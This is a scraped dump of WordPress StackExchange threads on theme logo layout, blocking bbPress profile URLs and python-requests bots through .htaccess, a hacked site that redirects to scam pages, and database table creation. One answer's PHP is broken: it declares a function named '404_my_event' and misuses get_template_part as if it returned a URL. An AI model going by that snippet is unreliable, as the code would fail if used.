</div>\n<?php endif; ?>\n</code></pre>\n\n<p>To make things a bit easier for styling purposes I wrapped the logo in a <code><div></code> with the class <code>logo-container</code> and did the same for the title and description - that'll just make it a bit easier for you to position them using CSS, but if you can remove those extra divs if you feel they're overkill. I also added a <code>no-logo</code> class to the <code>site-branding</code> div for the instance where there isn't a logo so you can modify the styling there.</p>\n<p><strong>EDITED | added some CSS:</strong></p>\n<pre><code>.site-branding{\n display:flex;\n align-items:center;\n justify-content:flex-start;\n flex-direction:row;\n width:100%;\n}\n.logo-container{\n width:35%;\n}\n.title-container{\n width:65%;\n display:flex;\n align-items:flex-start;\n justify-content:flex-start;\n flex-direction:column;\n}\n.title-container > .hotwp-site-title,\n.title-container > .hotwp-site-description{\n display:block;\n width:100%;\n}\n</code></pre>\n<p><em>Haven't tested the CSS but that's the general idea.</em></p>\n"
},
{
"answer_id": 376806,
"author": "Ricky Ritchey",
"author_id": 196266,
"author_profile": "https://wordpress.stackexchange.com/users/196266",
"pm_score": 0,
"selected": false,
"text": "<p>Thank you Tony.\nThis is the css code I have. May be this will help. I tried to ad it to my comment yesterday, but it wouldn't let me.</p>\n<pre><code>#hotwp-logo{\nmargin:5px 0px 5px 0px;\nfloat:left;\nwidth:41%;\n</code></pre>\n<p>}\n.hotwp-logo-img-link{\ndisplay:block;\n}\n.hotwp-logo-img{\ndisplay:block;\npadding:0;\nmargin:0;\n}\n.hotwp-site-title{\nfont:normal bold 24px 'Playfair Display',Arial,Helvetica,sans-serif;\nmargin:0 0 15px 0 !important;\nline-height:1 !important;\ncolor:#333333;\n}\n.hotwp-site-title a{\ncolor:#333333;\ntext-decoration:none;\n}\n.hotwp-site-description{\nfont:normal normal 13px Domine,Arial,Helvetica,sans-serif;\nline-height:1 !important;\ncolor:#333333;\n}\n.hotwp-header-banner #hotwp-logo{\nwidth:41%;\n}\n.hotwp-header-search #hotwp-logo{\nwidth:71%;\n}\n.hotwp-header-full #hotwp-logo{\nmargin:5px 0px 10px 0px;\nfloat:none;\nwidth:100%;\ntext-align:center;\n}\n.hotwp-header-full .hotwp-logo-img{\ndisplay:block;\npadding:0;\nmargin:0 auto;\n}\n#hotwp-logo{\nmargin:5px 0px 10px 0px;\nfloat:none;\nwidth:100% !important;\ntext-align:center;\n}\n.hotwp-logo-img{\ndisplay:block;\npadding:0;\nmargin:0 auto;\n}</p>\n"
}
] | 2020/10/17 | [
"https://wordpress.stackexchange.com/questions/376692",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/196266/"
] | The problem I'm having is the custom logo, site title, and description won't appear at the same time. In image 1 below, you can see that with no custom logo, the site title, and description appears just fine.
```php
<div id="hotwp-logo">
<?php if ( has_custom_logo() ) : ?>
<div class="site-branding">
<a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home" class="hotwp-logo-img-link">
<img src="<?php echo esc_url( hotwp_custom_logo() ); ?>" alt="" class="hotwp-logo-img"/>
</a>
</div>
<?php else: ?>
<div class="site-branding">
<h1 class="hotwp-site-title"><a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home"><?php bloginfo( 'name' ); ?></a></h1>
<p class="hotwp-site-description"><?php bloginfo( 'description' ); ?></p>
</div>
<?php endif; ?>
</div><!--/#hotwp-logo -->
```
**When I don’t have a logo, the tag line and the description is shown.**
**Image 1** 
**When I add a custom logo, the tag line and the description disappears.**
**Image 2** 
**This was edited to show what I need. The tag line and the description need to show, shifting to the right of the logo.**
**Image 3**  | Maybe I'm missing something here, but it looks like you have an if-else. If there is a logo, it shows. Else the title and description show. Try removing the if-else stuff. |
376,697 | <p>I know this should be easy. BBpress creates user profiles at /forums/users/.</p>
<p>I'd like to make them unavailable to anyone, and not be indexed by Google. I've tried the following (in .htaccess) and more, but nothing seems to work. Is it because these are not real directories, just a page hierarchy created by BBpress? What's the solution?</p>
<pre><code># RedirectMatch 404 ^/fora/users/.*$
# RedirectMatch 404 ^.*/users/.*$
# this give internal server error throughout site:
# <Files ~ "/users/">
# Header set X-Robots-Tag "noindex, nofollow"
# </FilesMatch>
# RewriteEngine on
# RewriteRule ^.*/users/.*$ - [F]
</code></pre>
| [
{
"answer_id": 376699,
"author": "GeorgeP",
"author_id": 160985,
"author_profile": "https://wordpress.stackexchange.com/users/160985",
"pm_score": 2,
"selected": false,
"text": "<p>Yes that's a pretty permalink created with rewrite rules for your posts/pages/CPT's and not a real directory.</p>\n<p>You can add the <code>nofollow</code> to a page that uses a certain php template (check <a href=\"https://developer.wordpress.org/reference/functions/body_class/\" rel=\"nofollow noreferrer\">body class</a>) or to the archive page of your CPT (if <code>users</code> is a CPT) by adding this to your functions.php or in a (mu-)plugin:</p>\n<pre><code>add_action( 'wp_head', function(){\n if( is_page_template('single-users.php') || is_post_type_archive('users') ) {\n echo '<meta name="robots" content="noindex">';\n }\n} );\n</code></pre>\n<p>Furthermore, you can add a <code>wp_redirect</code> to the top of each template and send to your 404 page, like this:</p>\n<pre><code>$url = get_template_part( 404 );\nwp_redirect($url, 404);\n</code></pre>\n<p>Alternatively you can use the Wordpress function <code>status_header()</code> to add the <code>HTTP/1.1 404 Not Found</code> header</p>\n<pre><code>function 404_my_event() {\n global $post;\n if ( is_singular( 'event' ) && !rr_event_should_be_available( $post->ID ) ) {\n global $wp_query;\n $wp_query->set_404();\n status_header(404);\n }\n}\nadd_action( 'wp', '404_my_event' );\n</code></pre>\n<p>References:</p>\n<ul>\n<li><a href=\"https://developer.wordpress.org/reference/hooks/wp_head/\" rel=\"nofollow noreferrer\">wp-head</a></li>\n<li><a href=\"https://developer.wordpress.org/themes/basics/conditional-tags/\" rel=\"nofollow noreferrer\">Conditional tags</a></li>\n<li><a href=\"https://developer.wordpress.org/reference/functions/status_header/\" rel=\"nofollow noreferrer\">status_header</a></li>\n</ul>\n"
},
{
"answer_id": 376717,
"author": "MrWhite",
"author_id": 8259,
"author_profile": "https://wordpress.stackexchange.com/users/8259",
"pm_score": 2,
"selected": true,
"text": "<blockquote>\n<pre><code># this give internal server error throughout site:\n<Files ~ "/users/">\nHeader set X-Robots-Tag "noindex, nofollow"\n</FilesMatch>\n</code></pre>\n</blockquote>\n<p>This would give an "internal server error" (500 response) because you've used <code></FilesMatch></code> to close the <code><Files></code> section. It should be <code></Files></code>.</p>\n<p>But as you suggested, this won't work anyway, as the <code><Files></code> directive matches real files only, not virtual URL-paths.</p>\n<p>But you don't need to set the <code>X-Robots-Tag</code> if you simply want to block (403 Forbidden) the request.</p>\n<blockquote>\n<pre><code>RewriteEngine on\nRewriteRule ^.*/users/.*$ - [F]\n</code></pre>\n</blockquote>\n<p>This should work, in order to send a "403 Forbidden" response for any URL that contains <code>/users/</code> as part of the URL-path, providing you place this at the <em>top</em> of your <code>.htaccess</code>, <em>before</em> the WordPress code block (ie. before the <code># BEGIN WordPress</code> section).</p>\n<p>However, you do not need to repeat the <code>RewriteEngine On</code> directive. And the <code>RewriteRule</code> <em>pattern</em> should be modified to avoid matching <code>/users/</code> <em>anywhere</em> in the URL-path, otherwise, it could potentially block valid URLs.</p>\n<p>Try the following instead at the top of your <code>.htaccess</code> file:</p>\n<pre><code>RewriteRule ^forums/users/ - [F]\n</code></pre>\n<p>This blocks any request that simply starts <code>/forums/users/</code>.</p>\n<p>Note there is no slash prefix on the <code>RewriteRule</code> <em>pattern</em>.</p>\n<hr />\n<p><strong>UPDATE:</strong> If this fails to work then make sure you don't have a custom 403 <code>ErrorDocument</code> defined. If not then this could still be configured in your server config (by your web host), which is out of your control. However, you can still reset this to the default Apache error response in your <code>.htaccess</code> file:</p>\n<pre><code>ErrorDocument 403 default\n</code></pre>\n<blockquote>\n<p>a way to make it go 404 instead, ...? I don't find such a flag for RewriteRule.</p>\n</blockquote>\n<p>You can use the <code>R=404</code> flag instead of <code>F</code> to trigger a "404 Not Found" response. Whilst this might look like a "redirect", since it's using the <code>R</code> (<code>redirect</code>) flag, it's not an external redirect (which is only triggered for 3xx response codes).</p>\n<p>In fact, you can use <code>R=403</code> instead of <code>F</code> if you wanted to. <code>F</code> is simply a shortcut.</p>\n"
}
] | 2020/10/17 | [
"https://wordpress.stackexchange.com/questions/376697",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/195306/"
] | I know this should be easy. BBpress creates user profiles at /forums/users/.
I'd like to make them unavailable to anyone, and not be indexed by Google. I've tried the following (in .htaccess) and more, but nothing seems to work. Is it because these are not real directories, just a page hierarchy created by BBpress? What's the solution?
```
# RedirectMatch 404 ^/fora/users/.*$
# RedirectMatch 404 ^.*/users/.*$
# this give internal server error throughout site:
# <Files ~ "/users/">
# Header set X-Robots-Tag "noindex, nofollow"
# </FilesMatch>
# RewriteEngine on
# RewriteRule ^.*/users/.*$ - [F]
``` | >
>
> ```
> # this give internal server error throughout site:
> <Files ~ "/users/">
> Header set X-Robots-Tag "noindex, nofollow"
> </FilesMatch>
>
> ```
>
>
This would give an "internal server error" (500 response) because you've used `</FilesMatch>` to close the `<Files>` section. It should be `</Files>`.
But as you suggested, this won't work anyway, as the `<Files>` directive matches real files only, not virtual URL-paths.
But you don't need to set the `X-Robots-Tag` if you simply want to block (403 Forbidden) the request.
>
>
> ```
> RewriteEngine on
> RewriteRule ^.*/users/.*$ - [F]
>
> ```
>
>
This should work, in order to send a "403 Forbidden" response for any URL that contains `/users/` as part of the URL-path, providing you place this at the *top* of your `.htaccess`, *before* the WordPress code block (ie. before the `# BEGIN WordPress` section).
However, you do not need to repeat the `RewriteEngine On` directive. And the `RewriteRule` *pattern* should be modified to avoid matching `/users/` *anywhere* in the URL-path, otherwise, it could potentially block valid URLs.
Try the following instead at the top of your `.htaccess` file:
```
RewriteRule ^forums/users/ - [F]
```
This blocks any request that simply starts `/forums/users/`.
Note there is no slash prefix on the `RewriteRule` *pattern*.
---
**UPDATE:** If this fails to work then make sure you don't have a custom 403 `ErrorDocument` defined. If not then this could still be configured in your server config (by your web host), which is out of your control. However, you can still reset this to the default Apache error response in your `.htaccess` file:
```
ErrorDocument 403 default
```
>
> a way to make it go 404 instead, ...? I don't find such a flag for RewriteRule.
>
>
>
You can use the `R=404` flag instead of `F` to trigger a "404 Not Found" response. Whilst this might look like a "redirect", since it's using the `R` (`redirect`) flag, it's not an external redirect (which is only triggered for 3xx response codes).
In fact, you can use `R=403` instead of `F` if you wanted to. `F` is simply a shortcut. |
376,730 | <p>This is my first post, I tried searching for similar problems, didn't find any that would fit my situation. Anyway.</p>
<p>Recently my cousins website got hacked, I decided to take a look and try to fix it as an exercise. I have little to none experience with web dev, so I hope to get some helpful feedback here. Whenever I type the URL in the address bar (or search for it on search engines) I get redirected to some blog site or one of those you won the iphone scam sites. It is also true for all subpages of the website.</p>
<p>What's weird to me is that it only happens on PC. URL works fine when using mobile or trying it in private mode. Also I can only access WP dashboard by typing url/wp-login.php using private mode. Whenever I try to do it in normal it also redirects me to that blog site login window.</p>
<p>In dashboard I noticed that bunch of plugins and WP version is outdated. I updated those relating to security and antispam, haven't updated WP version yet. As I didn't make this website and don't yet have FTP access I decided to wait with the update until I can make a full backup of the website.</p>
<p>Wordfence <a href="https://paste.pics/6534f5cbd81e4130c2abee97ff5bbc1f" rel="nofollow noreferrer">scan results</a> did mark bunch of files as potentially malicious. They also have weird names that are just strings of characters which also raises red flags.</p>
<p>I installed WP file manager plugin and managed to download .htaccess file.</p>
<pre><code><IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# BEGIN MainWP
# END MainWP
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
</code></pre>
<p>I'm not sure what to make of it as it looks similar to default basic WP htaccess, but written twice, with some weird additions. index.php was also flagged as malicious so I suspect here is a part of the problem. Help understanding it will be appreciated.</p>
<p>My question would be how do I proceed from here and how do I find the source of redirect? I've read that it's not worth the hassle of cleaning up hacked websites and it's much easier to just setup new server and migrate whole website there. But if I create full backup of the site and then reupload everything won't I also be migrating those malicious files with me? I also have no idea how to do it. I didn't make the website so it's not so obvious to me which files weren't there from the getgo.</p>
<p>I don't know what more to add as this post is pretty lengthy. If needed I can provide additional info.</p>
| [
{
"answer_id": 376699,
"author": "GeorgeP",
"author_id": 160985,
"author_profile": "https://wordpress.stackexchange.com/users/160985",
"pm_score": 2,
"selected": false,
"text": "<p>Yes that's a pretty permalink created with rewrite rules for your posts/pages/CPT's and not a real directory.</p>\n<p>You can add the <code>nofollow</code> to a page that uses a certain php template (check <a href=\"https://developer.wordpress.org/reference/functions/body_class/\" rel=\"nofollow noreferrer\">body class</a>) or to the archive page of your CPT (if <code>users</code> is a CPT) by adding this to your functions.php or in a (mu-)plugin:</p>\n<pre><code>add_action( 'wp_head', function(){\n if( is_page_template('single-users.php') || is_post_type_archive('users') ) {\n echo '<meta name="robots" content="noindex">';\n }\n} );\n</code></pre>\n<p>Furthermore, you can add a <code>wp_redirect</code> to the top of each template and send to your 404 page, like this:</p>\n<pre><code>$url = get_template_part( 404 );\nwp_redirect($url, 404);\n</code></pre>\n<p>Alternatively you can use the Wordpress function <code>status_header()</code> to add the <code>HTTP/1.1 404 Not Found</code> header</p>\n<pre><code>function 404_my_event() {\n global $post;\n if ( is_singular( 'event' ) && !rr_event_should_be_available( $post->ID ) ) {\n global $wp_query;\n $wp_query->set_404();\n status_header(404);\n }\n}\nadd_action( 'wp', '404_my_event' );\n</code></pre>\n<p>References:</p>\n<ul>\n<li><a href=\"https://developer.wordpress.org/reference/hooks/wp_head/\" rel=\"nofollow noreferrer\">wp-head</a></li>\n<li><a href=\"https://developer.wordpress.org/themes/basics/conditional-tags/\" rel=\"nofollow noreferrer\">Conditional tags</a></li>\n<li><a href=\"https://developer.wordpress.org/reference/functions/status_header/\" rel=\"nofollow noreferrer\">status_header</a></li>\n</ul>\n"
},
{
"answer_id": 376717,
"author": "MrWhite",
"author_id": 8259,
"author_profile": "https://wordpress.stackexchange.com/users/8259",
"pm_score": 2,
"selected": true,
"text": "<blockquote>\n<pre><code># this give internal server error throughout site:\n<Files ~ "/users/">\nHeader set X-Robots-Tag "noindex, nofollow"\n</FilesMatch>\n</code></pre>\n</blockquote>\n<p>This would give an "internal server error" (500 response) because you've used <code></FilesMatch></code> to close the <code><Files></code> section. It should be <code></Files></code>.</p>\n<p>But as you suggested, this won't work anyway, as the <code><Files></code> directive matches real files only, not virtual URL-paths.</p>\n<p>But you don't need to set the <code>X-Robots-Tag</code> if you simply want to block (403 Forbidden) the request.</p>\n<blockquote>\n<pre><code>RewriteEngine on\nRewriteRule ^.*/users/.*$ - [F]\n</code></pre>\n</blockquote>\n<p>This should work, in order to send a "403 Forbidden" response for any URL that contains <code>/users/</code> as part of the URL-path, providing you place this at the <em>top</em> of your <code>.htaccess</code>, <em>before</em> the WordPress code block (ie. before the <code># BEGIN WordPress</code> section).</p>\n<p>However, you do not need to repeat the <code>RewriteEngine On</code> directive. And the <code>RewriteRule</code> <em>pattern</em> should be modified to avoid matching <code>/users/</code> <em>anywhere</em> in the URL-path, otherwise, it could potentially block valid URLs.</p>\n<p>Try the following instead at the top of your <code>.htaccess</code> file:</p>\n<pre><code>RewriteRule ^forums/users/ - [F]\n</code></pre>\n<p>This blocks any request that simply starts <code>/forums/users/</code>.</p>\n<p>Note there is no slash prefix on the <code>RewriteRule</code> <em>pattern</em>.</p>\n<hr />\n<p><strong>UPDATE:</strong> If this fails to work then make sure you don't have a custom 403 <code>ErrorDocument</code> defined. If not then this could still be configured in your server config (by your web host), which is out of your control. However, you can still reset this to the default Apache error response in your <code>.htaccess</code> file:</p>\n<pre><code>ErrorDocument 403 default\n</code></pre>\n<blockquote>\n<p>a way to make it go 404 instead, ...? I don't find such a flag for RewriteRule.</p>\n</blockquote>\n<p>You can use the <code>R=404</code> flag instead of <code>F</code> to trigger a "404 Not Found" response. Whilst this might look like a "redirect", since it's using the <code>R</code> (<code>redirect</code>) flag, it's not an external redirect (which is only triggered for 3xx response codes).</p>\n<p>In fact, you can use <code>R=403</code> instead of <code>F</code> if you wanted to. <code>F</code> is simply a shortcut.</p>\n"
}
] | 2020/10/18 | [
"https://wordpress.stackexchange.com/questions/376730",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/196288/"
] | This is my first post, I tried searching for similar problems, didn't find any that would fit my situation. Anyway.
Recently my cousins website got hacked, I decided to take a look and try to fix it as an exercise. I have little to none experience with web dev, so I hope to get some helpful feedback here. Whenever I type the URL in the address bar (or search for it on search engines) I get redirected to some blog site or one of those you won the iphone scam sites. It is also true for all subpages of the website.
What's weird to me is that it only happens on PC. URL works fine when using mobile or trying it in private mode. Also I can only access WP dashboard by typing url/wp-login.php using private mode. Whenever I try to do it in normal it also redirects me to that blog site login window.
In dashboard I noticed that bunch of plugins and WP version is outdated. I updated those relating to security and antispam, haven't updated WP version yet. As I didn't make this website and don't yet have FTP access I decided to wait with the update until I can make a full backup of the website.
Wordfence [scan results](https://paste.pics/6534f5cbd81e4130c2abee97ff5bbc1f) did mark bunch of files as potentially malicious. They also have weird names that are just strings of characters which also raises red flags.
I installed WP file manager plugin and managed to download .htaccess file.
```
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# BEGIN MainWP
# END MainWP
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
```
I'm not sure what to make of it as it looks similar to default basic WP htaccess, but written twice, with some weird additions. index.php was also flagged as malicious so I suspect here is a part of the problem. Help understanding it will be appreciated.
My question would be how do I proceed from here and how do I find the source of redirect? I've read that it's not worth the hassle of cleaning up hacked websites and it's much easier to just setup new server and migrate whole website there. But if I create full backup of the site and then reupload everything won't I also be migrating those malicious files with me? I also have no idea how to do it. I didn't make the website so it's not so obvious to me which files weren't there from the getgo.
I don't know what more to add as this post is pretty lengthy. If needed I can provide additional info. | >
>
> ```
> # this give internal server error throughout site:
> <Files ~ "/users/">
> Header set X-Robots-Tag "noindex, nofollow"
> </FilesMatch>
>
> ```
>
>
This would give an "internal server error" (500 response) because you've used `</FilesMatch>` to close the `<Files>` section. It should be `</Files>`.
But as you suggested, this won't work anyway, as the `<Files>` directive matches real files only, not virtual URL-paths.
But you don't need to set the `X-Robots-Tag` if you simply want to block (403 Forbidden) the request.
>
>
> ```
> RewriteEngine on
> RewriteRule ^.*/users/.*$ - [F]
>
> ```
>
>
This should work, in order to send a "403 Forbidden" response for any URL that contains `/users/` as part of the URL-path, providing you place this at the *top* of your `.htaccess`, *before* the WordPress code block (ie. before the `# BEGIN WordPress` section).
However, you do not need to repeat the `RewriteEngine On` directive. And the `RewriteRule` *pattern* should be modified to avoid matching `/users/` *anywhere* in the URL-path, otherwise, it could potentially block valid URLs.
Try the following instead at the top of your `.htaccess` file:
```
RewriteRule ^forums/users/ - [F]
```
This blocks any request that simply starts `/forums/users/`.
Note there is no slash prefix on the `RewriteRule` *pattern*.
---
**UPDATE:** If this fails to work then make sure you don't have a custom 403 `ErrorDocument` defined. If not then this could still be configured in your server config (by your web host), which is out of your control. However, you can still reset this to the default Apache error response in your `.htaccess` file:
```
ErrorDocument 403 default
```
>
> a way to make it go 404 instead, ...? I don't find such a flag for RewriteRule.
>
>
>
You can use the `R=404` flag instead of `F` to trigger a "404 Not Found" response. Whilst this might look like a "redirect", since it's using the `R` (`redirect`) flag, it's not an external redirect (which is only triggered for 3xx response codes).
In fact, you can use `R=403` instead of `F` if you wanted to. `F` is simply a shortcut. |
376,734 | <p>I've recently started paying greater attention to my 404 errors in order to clean up what I can and improve my site's SEO and ranking, and have noticed something that I don't understand.</p>
<p>In my 404 error log, I'm seeing quite a few searches conducted by user agents that look like this:</p>
<blockquote>
<p>python-requests/2.23.0python-requests 2.23.0</p>
</blockquote>
<p>And several that are similar.....but they are all requesting files that don't exist.</p>
<p>What are the python searches? Are they like bad bots? How do I block or prevent them?</p>
<p>I have a lot of bad bots too, and I found an older (2017) resource with some code to block them by User-Agent in my .htaccess file, which I implemented but it does not seem to be working - I still see logs of those bad bots also requesting mostly non-existent resources as well as a lot of posts with the /email or /print appended..... is there any truly effective way to block bad user-agents?</p>
| [
{
"answer_id": 376737,
"author": "Tom J Nowell",
"author_id": 736,
"author_profile": "https://wordpress.stackexchange.com/users/736",
"pm_score": 2,
"selected": false,
"text": "<p>User agents can be anything, it's the client that sets them, so I could make a curl request to your site and tell curl that my user agent is going to be "Tom is the best"</p>\n<blockquote>\n<p>python-requests/2.23.0python-requests 2.23.0</p>\n</blockquote>\n<p>This particular user agent implies the python requests library is making the request, but no clues as to what's using the library or why ( <a href=\"https://pypi.org/project/requests/\" rel=\"nofollow noreferrer\">https://pypi.org/project/requests/</a> ).</p>\n<p>As for blocking them, this is something you would do at a deeper level than WordPress. You seem to already be familiar with Apache HTAccess, there may be lower levels that they can be blocked at, or by your host or proxies. <em>That would be beyond the scope of this site</em></p>\n<p>As for why they're requesting non-existant resources, there could be lots of reasons:</p>\n<ul>\n<li>A site elsewhere is referencing them and these bots are spidering over and hitting 404s</li>\n<li>They're exploits, malware will regularly fire and forget their entire arsenal in hopes that one will work. They don't even bother to check what comes back, my WP site regularly gets hit with Drupal exploits despite them being completely ineffective.</li>\n<li>Broken sitemaps!</li>\n<li>Those assets might have been available on older sites that were on the domain before site rebuilds</li>\n</ul>\n<p>The only way to know for sure is to somehow find somebody doing it and ask them, which isn't normally possible.</p>\n"
},
{
"answer_id": 376738,
"author": "MrWhite",
"author_id": 8259,
"author_profile": "https://wordpress.stackexchange.com/users/8259",
"pm_score": 2,
"selected": true,
"text": "<blockquote>\n<p>What are the python searches? Are they like bad bots?</p>\n</blockquote>\n<p>Most probably just "bad bots" searching for potential vulnerabilities.</p>\n<blockquote>\n<p>How do I block or prevent them?</p>\n</blockquote>\n<p>Well, you are already serving a 404 by the sounds of it, so it's really a non-issue. However, you can prevent the request from going through WordPress by blocking the request early in <code>.htaccess</code>, as you are already probably doing.</p>\n<p>For example, at the top of your <code>.htaccess</code> file:</p>\n<pre><code>RewriteCond %{HTTP_USER_AGENT} python [NC]\nRewriteRule ^ - [R=404]\n</code></pre>\n<p>The above sends a 404 Not Found for any request from a user-agent that contains "python" (not case-sensitive).</p>\n<p>However, blocking by user-agent isn't necessarily that reliable since many "bad bots" pretend to be regular users.</p>\n<blockquote>\n<p>I found an older (2017) resource with some code to block them by User-Agent in my .htaccess file, which I implemented but it does not seem to be working - I still see logs of those bad bots</p>\n</blockquote>\n<p>If you block the "bad bot" in <code>.htaccess</code> you will still see the request in your server's access log. However, the log entry should show the HTTP status as 403 or 404 if it is blocked.</p>\n<p>The only way to block the request entirely from hitting your server (and appearing in your server's logs) is if you have a frontend proxy-server / firewall that "screens" all your requests.</p>\n"
}
] | 2020/10/18 | [
"https://wordpress.stackexchange.com/questions/376734",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/56458/"
] | I've recently started paying greater attention to my 404 errors in order to clean up what I can and improve my site's SEO and ranking, and have noticed something that I don't understand.
In my 404 error log, I'm seeing quite a few searches conducted by user agents that look like this:
>
> python-requests/2.23.0python-requests 2.23.0
>
>
>
And several that are similar.....but they are all requesting files that don't exist.
What are the python searches? Are they like bad bots? How do I block or prevent them?
I have a lot of bad bots too, and I found an older (2017) resource with some code to block them by User-Agent in my .htaccess file, which I implemented but it does not seem to be working - I still see logs of those bad bots also requesting mostly non-existent resources as well as a lot of posts with the /email or /print appended..... is there any truly effective way to block bad user-agents? | >
> What are the python searches? Are they like bad bots?
>
>
>
Most probably just "bad bots" searching for potential vulnerabilities.
>
> How do I block or prevent them?
>
>
>
Well, you are already serving a 404 by the sounds of it, so it's really a non-issue. However, you can prevent the request from going through WordPress by blocking the request early in `.htaccess`, as you are already probably doing.
For example, at the top of your `.htaccess` file:
```
RewriteCond %{HTTP_USER_AGENT} python [NC]
RewriteRule ^ - [R=404]
```
The above sends a 404 Not Found for any request from a user-agent that contains "python" (not case-sensitive).
However, blocking by user-agent isn't necessarily that reliable since many "bad bots" pretend to be regular users.
>
> I found an older (2017) resource with some code to block them by User-Agent in my .htaccess file, which I implemented but it does not seem to be working - I still see logs of those bad bots
>
>
>
If you block the "bad bot" in `.htaccess` you will still see the request in your server's access log. However, the log entry should show the HTTP status as 403 or 404 if it is blocked.
The only way to block the request entirely from hitting your server (and appearing in your server's logs) is if you have a frontend proxy-server / firewall that "screens" all your requests. |
376,765 | <p>I am working on a legacy code where part of the website uses WP and other part ASP.net etc. Is there an easy way to tell me what content is coming from WP vs Non-WordPress? Since the codebase is large this can help me understand the flow of information.</p>
| [
{
"answer_id": 376768,
"author": "cjbj",
"author_id": 75495,
"author_profile": "https://wordpress.stackexchange.com/users/75495",
"pm_score": 3,
"selected": true,
"text": "<p>This depends very much on you setup and how you want to be able to see this.</p>\n<p>If you look in the source code of a page, you are very likely to be able to see which page is WP generated, because there will be strings like <code>wp-content</code> and <code>wp-includes</code> present (for instance because <code>jquery</code> is loaded by default). You could also add a specific code to the head of your site like this:</p>\n<pre><code>add_action ('wp_head','wpse376765_add_code');\nfunction wpse376765_add_code () {\n echo '<meta name="wpmademe">';\n }\n</code></pre>\n<p>If you want it to be visible in the page itself, the easiest way would be to attach a little marker for admins only by including this in the <code>functions.php</code> of your theme:</p>\n<pre><code>add_action ('wp_footer','wpse376765_add_code_to_footer');\nfunction wpse376765_add_code_to_footer () {\n if (is_admin()) echo '<span>WP made me</span>';\n }\n</code></pre>\n"
},
{
"answer_id": 376770,
"author": "Tom J Nowell",
"author_id": 736,
"author_profile": "https://wordpress.stackexchange.com/users/736",
"pm_score": 1,
"selected": false,
"text": "<p>WordPress outputs a generator meta tag using the <code>the_generator()</code> function, that you can use to identify it.</p>\n<p>For example, WordPress.com sites have this:</p>\n<pre class=\"lang-html prettyprint-override\"><code><meta name="generator" content="WordPress.com" />\n</code></pre>\n<p><a href=\"https://www.metatags.org/all-meta-tags-overview/meta-name-generator/\" rel=\"nofollow noreferrer\">https://www.metatags.org/all-meta-tags-overview/meta-name-generator/</a></p>\n<p>Note that some themes/plugins remove this tag as it has no practical use for most developers and no SEO benefit</p>\n"
}
] | 2020/10/19 | [
"https://wordpress.stackexchange.com/questions/376765",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/196314/"
] | I am working on a legacy code where part of the website uses WP and other part ASP.net etc. Is there an easy way to tell me what content is coming from WP vs Non-WordPress? Since the codebase is large this can help me understand the flow of information. | This depends very much on you setup and how you want to be able to see this.
If you look in the source code of a page, you are very likely to be able to see which page is WP generated, because there will be strings like `wp-content` and `wp-includes` present (for instance because `jquery` is loaded by default). You could also add a specific code to the head of your site like this:
```
add_action ('wp_head','wpse376765_add_code');
function wpse376765_add_code () {
echo '<meta name="wpmademe">';
}
```
If you want it to be visible in the page itself, the easiest way would be to attach a little marker for admins only by including this in the `functions.php` of your theme:
```
add_action ('wp_footer','wpse376765_add_code_to_footer');
function wpse376765_add_code_to_footer () {
if (is_admin()) echo '<span>WP made me</span>';
}
``` |
376,827 | <p>I tried creating the tables in different ways and I always get the same error:
<em>"Error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '( ...... at line 1 of the WordPress database for the CREATE TABLE IF NOT query EXISTS"</em></p>
<pre><code> require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
global $wpdb, $rs_plugin_db_version, $table_name_clientes, $table_name_promociones;
$charset_collate = $wpdb->get_charset_collate();
$wpdb->query(
"CREATE TABLE IF NOT EXISTS $table_name_clientes (
id int(11) NOT NULL,
logo text NOT NULL,
name text NOT NULL,
whatsapp text DEFAULT '' NOT NULL,
instagram text DEFAULT '' NOT NULL,
facebook text DEFAULT '' NOT NULL,
PRIMARY KEY (id)
) $charset_collate ENGINE = InnoDB"
);
dbDelta();
$wpdb->query(
"CREATE TABLE IF NOT EXISTS $table_name_promociones (
id int(11) NOT NULL,
img text NOT NULL,
title text NOT NULL,
content text NOT NULL,
owner int(11) NOT NULL,
contact int(11) NOT NULL,
PRIMARY KEY (id),
FOREIGN KEY (owner) REFERENCES $table_name_clientes(id) ON DELETE CASCADE ON UPDATE CASCADE
) $charset_collate ENGINE = InnoDB"
);
dbDelta();
</code></pre>
<p>In one of the tables I need to create a foreign key, if I didn't misunderstood dbDelta() does not support them and therefore my last attempt was with $wpdb->query, but with or without foreign key the result is the same.</p>
<p>maybe my mistake is obvious, but honestly I can't find it</p>
| [
{
"answer_id": 376830,
"author": "Tom J Nowell",
"author_id": 736,
"author_profile": "https://wordpress.stackexchange.com/users/736",
"pm_score": 1,
"selected": false,
